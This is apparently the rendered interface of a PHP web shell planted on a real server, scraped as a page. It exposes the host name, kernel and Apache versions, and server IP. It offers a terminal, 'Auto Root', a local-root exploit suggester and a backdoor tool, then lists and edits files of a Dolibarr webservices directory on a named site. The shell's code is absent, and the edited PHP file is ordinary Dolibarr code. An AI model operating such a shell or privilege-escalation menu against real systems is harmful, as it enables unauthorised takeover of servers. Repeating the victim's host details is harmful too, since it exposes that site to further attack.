Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.35
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html /
gf.bdcloud.fr /
webservices /
Delete
Unzip
Name
Size
Permission
Date
Action
admin
[ DIR ]
drwxr-xr-x
2025-11-08 11:17
README.md
797
B
-rw-r--r--
2020-10-12 13:32
demo_wsclient_actioncomm.php-NORUN
4.31
KB
-rw-r--r--
2020-10-12 13:32
demo_wsclient_category.php-NORUN
2.74
KB
-rw-r--r--
2020-10-12 13:32
demo_wsclient_invoice.php-NORUN
3.92
KB
-rw-r--r--
2020-10-12 13:32
demo_wsclient_order.php-NORUN
3.92
KB
-rw-r--r--
2020-10-12 13:32
demo_wsclient_other.php-NORUN
2.91
KB
-rw-r--r--
2020-10-12 13:32
demo_wsclient_productorservice.php-NORUN
4.97
KB
-rw-r--r--
2020-10-12 13:32
demo_wsclient_project.php-NORUN
4.26
KB
-rw-r--r--
2020-10-12 13:32
demo_wsclient_thirdparty.php-NORUN
6.17
KB
-rw-r--r--
2020-10-12 13:32
index.php
1.73
KB
-rw-r--r--
2020-10-12 13:32
server_actioncomm.php
18.31
KB
-rw-r--r--
2020-10-12 13:32
server_category.php
7.87
KB
-rw-r--r--
2020-10-12 13:32
server_contact.php
23.58
KB
-rw-r--r--
2020-10-12 13:32
server_invoice.php
27.99
KB
-rw-r--r--
2020-10-12 13:32
server_order.php
29.99
KB
-rw-r--r--
2020-10-12 13:32
server_other.php
9.02
KB
-rw-r--r--
2020-10-12 13:32
server_payment.php
7.72
KB
-rw-r--r--
2020-10-12 13:32
server_productorservice.php
39.3
KB
-rw-r--r--
2020-10-12 13:32
server_project.php
14.88
KB
-rw-r--r--
2020-10-12 13:32
server_supplier_invoice.php
15.48
KB
-rw-r--r--
2020-10-12 13:32
server_thirdparty.php
28.67
KB
-rw-r--r--
2020-10-12 13:32
server_user.php
23.8
KB
-rw-r--r--
2020-10-12 13:32
Save
Rename
<?php /* Copyright (C) 2006-2011 Laurent Destailleur <eldy@users.sourceforge.net> * Copyright (C) 2011 Regis Houssin <regis.houssin@inodbox.com> * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <https://www.gnu.org/licenses/>. */ /** * \file htdocs/webservices/server_invoice.php * \brief File that is entry point to call Dolibarr WebServices */ // This is to make Dolibarr working with Plesk set_include_path($_SERVER['DOCUMENT_ROOT'].'/htdocs'); require_once '../master.inc.php'; require_once NUSOAP_PATH.'/nusoap.php'; // Include SOAP require_once DOL_DOCUMENT_ROOT.'/user/class/user.class.php'; $langs->load("admin"); /* * View */ dol_syslog("Call Dolibarr webservices interfaces"); // Enable and test if module web services is enabled if (empty($conf->global->MAIN_MODULE_WEBSERVICES)) { $langs->load("admin"); dol_syslog("Call Dolibarr webservices interfaces with module webservices disabled"); print $langs->trans("WarningModuleNotActive", 'WebServices').'.<br><br>'; print $langs->trans("ToActivateModule"); exit; } // WSDL print 'List of available SOAP Web services is visible on the setup area, setup page of module WebService SOAP.'; $db->close();